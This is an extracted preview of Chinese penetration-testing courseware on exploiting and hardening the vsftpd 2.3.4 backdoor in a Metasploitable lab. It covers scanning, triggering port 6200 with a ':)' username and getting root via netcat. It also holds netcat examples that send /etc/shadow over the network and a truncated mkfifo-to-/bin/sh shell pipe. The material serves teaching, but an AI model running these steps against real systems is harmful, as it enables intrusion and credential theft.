网络攻防项目实战 课件 2.4 文件传输服务后门漏洞利用与加固_第1页
网络攻防项目实战 课件 2.4 文件传输服务后门漏洞利用与加固_第2页
网络攻防项目实战 课件 2.4 文件传输服务后门漏洞利用与加固_第3页
网络攻防项目实战 课件 2.4 文件传输服务后门漏洞利用与加固_第4页
网络攻防项目实战 课件 2.4 文件传输服务后门漏洞利用与加固_第5页
已阅读5页,还剩13页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

2.4文件传输服务后门漏洞利用与加固020301环境部署漏洞渗透测试任务目录漏洞介绍​FTP是一个文件传输协议,用户通过FTP可从客户机程序向远程主机上传或下载文件,常用于网站代码维护、日常源码备份等。在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名包含”:)”时,服务器就会在6200端口监听,并且能够执行任意代码。VSFTP2.3.4漏洞实验环境部署针对ftp服务的后门漏洞01渗透环境Kali2.0下载:/get-kali/#kali-virtual-machines登录信息:

用户root

密码toorkali网络配置靶机环境靶机信息: metasploit2.0

登录用户 msfadmin

登录密码 msfadmin root账号测试用

123456漏洞渗透测试VSFTP2.3.4漏洞渗透测试02漏洞渗透测试-信息收集1.收集网络中存活的主机地址漏洞渗透测试-信息收集2.扫描系统类型以及端口信息漏洞渗透测试-信息收集3.在版本信息探测中,发现可能存在vsftp2.3.4漏洞漏洞渗透测试4.方式1:在物理机cmd中打开ftp输入带有:)符号的用户名,任意密码漏洞渗透测试4.方式2:在物理机打开ftp输入带有:)符号的用户名,任意密码漏洞渗透测试5.使用nmap–sS–p-32对目标进行全部对口扫描6.发现在利用:)笑脸符号登录时会开启6200后门端口漏洞渗透测试6.使用nc(瑞士军刀)工具,我们可以通过端口连接目标主机,并获得root权限任务一1.对靶机环境进行渗透测试2.找出上图靶机的flag3.获取目标靶机mysql权限,修改管理员登录密码为987654321Netcat扩展netcat:瑞士军刀 nc/netcat(选项)(参数) nc322查看该ip此端口上运行的程序 -l使用监听模式,监控传入的资料

-p[num]指定端口例: 1.Server-l1234ClientServer.ip1234聊天效果 2.Server-l1234>/etc/shadowClientServer.ip>myfile文件传输 3.建立管道mkfifo/tmp/tmp_fifo cat/tmp/tmp_fifo|/bin/sh-i2>&

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论